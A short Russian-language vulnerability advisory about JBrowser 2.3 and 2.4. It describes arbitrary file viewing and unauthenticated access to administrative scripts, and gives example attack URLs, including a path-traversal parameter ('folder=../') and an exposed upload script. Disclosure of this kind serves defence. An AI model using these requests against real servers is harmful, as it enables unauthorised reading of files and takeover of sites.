Программа: JBrowser 2.3 и 2.4 

Две уязвимости обнаружены в JBrowser. Удаленный пользователь может просматривать произвольные файлы с привилегиями Web сервера. Удаленный пользователь может также получить доступ к административным сценариям в конфигурации по умолчанию. 

1. Просмотр произвольных файлов: 

http://[target]/browser.php?directory=[ATTACKER_SPECIFIED_PATH]

2. Доступ к административным сценариям: 

http://[target]/_admin/
http://[target]/_admin/list_all.php?folder=../
http://[target]/_admin/upload.php

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии